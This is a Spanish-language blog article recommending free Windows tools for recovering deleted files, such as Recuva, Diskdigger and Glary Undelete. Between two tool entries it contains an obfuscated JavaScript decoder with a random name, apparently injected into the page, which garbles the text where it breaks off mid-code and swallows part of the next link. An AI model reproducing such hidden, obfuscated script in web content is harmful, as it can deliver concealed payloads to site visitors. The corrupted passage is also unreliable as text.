MOUNTAIN Noticias y Reviews Cómo recuperar archivos borrados en disco duro

Noticias y Reviews

Cómo recuperar archivos borrados en disco duro

Share on Facebook0Tweet about this on TwitterShare on LinkedIn0Pin on Pinterest0Email this to someone

Recuperar datos

En muchas ocasiones un borrado accidental de archivos nos puede dar más de un dolor de cabeza. A veces algunos de nuestros preciados datos quedan postergados al cubo de la basura virtual de Windows y no somos capaces de recuperarlos. En esos casos, lo mejor es recurrir a una serie de utilidades preparadas para traer de vuelta todo aquello que ha desaparecido entre los clústeres del ordenador.

El principal problema es que un disco duro deja el espacio como libre una vez que hemos eliminado algo, y esa misma porción será ocupada por más datos si seguimos sobre-escribiendo, dificultando de esta manera la posterior recuperación. Lo mejor que puede hacer el usuario es dejar de introducir datos en el ordenador, de esta manera incrementaremos las probabilidades que existen de poder recuperar la información que se quiere volver a rescatar.

Existen muchos programas gratuitos que pueden ayudarnos en este sentido. Presentamos algunos de ellos para poder recuperar datos relevantes que se hayan perdido. Para descargarlos, puedes pulsar en cada uno de sus nombres:

Diskdigger

Es un programa excelente para recuperar archivos borrados accidentalmente en discos duros, pendrives, tarjetas de memoria, etc.

La gran ventaja de este programa es que es portable, lo que quiere decir que no necesita que esté instalado en el dispositivo donde se use, por lo que no instala nada que sobreescriba información importante. Este programa funciona en Windows 2000, Windows XP, Windows Vista y Windows 7.

Glary Undelete

Es una gran herramienta de recuperación de datos y funciona con discos duros, pendrives y tarjetas de memoria. Es una utilidad que tiene una interfaz que recuerda al explorador de Windows, por lo que nos resultará muy familiar. El único “problema” es que necesita ser instalado, pero esto es un ligero inconveniente en comparación a los beneficios que nos reportará su uso.

Funciona bajo sistema Windows 2000, 2003, NT, ME, Windows 98, Windows 95, Windows XP, Windows Vista, Windows XP y Windows 7.

Recuva

Recuva vendrá muy bien para recuperar todos los archivos que hemos perdido o borrado por error. Puede trabajar perfectamente con nuestros pendrives, tarjetas de memoria y discos duros. La gran noticia es que también tiene una versión portable, con lo que nos ahorraremos tener que instalar la aplicación.

Este programa funciona en los siguientes sistemas operativos: Windows 7, Windows Vista, Windows XP, Windows 2003 y Windows 2000.

FreeUndelete

Una buena alternativa para volver a recuperar todos nuestros archivos. Resulta una herramienta muy útil para traer de nuevo a la vida todo tipo de fotos e imágenes en JPEG, GIF TIFF, BMP, PNG O RAW (.jpg, .jpeg, .gif, .tiff, .bmp, .png). Con esta herramienta se pueden recuperar archivos alojados en tarjetas de memoria, discos duros y pendrives.

Una característica muy importante es que funciona con todos las versiones de Windows.

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6orarecovery.com/" target="_blank">Pandora Recovery

Este programa nos ayudará a recuperar los datos de un gran número de dispositivos tales como memorias USB, memorias Flash, unidades de red, discos duros, etc.

La principal ventaja es que lleva consigo un buen asistente que nos ayudará a recuperar todos los archivos pertenecientes a música, fotos, documentos…

Funciona sin problemas en Windows 2000, Windows XP, Windows 2003 y Windows Vista.

2 comentarios en “Cómo recuperar archivos borrados en disco duro

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *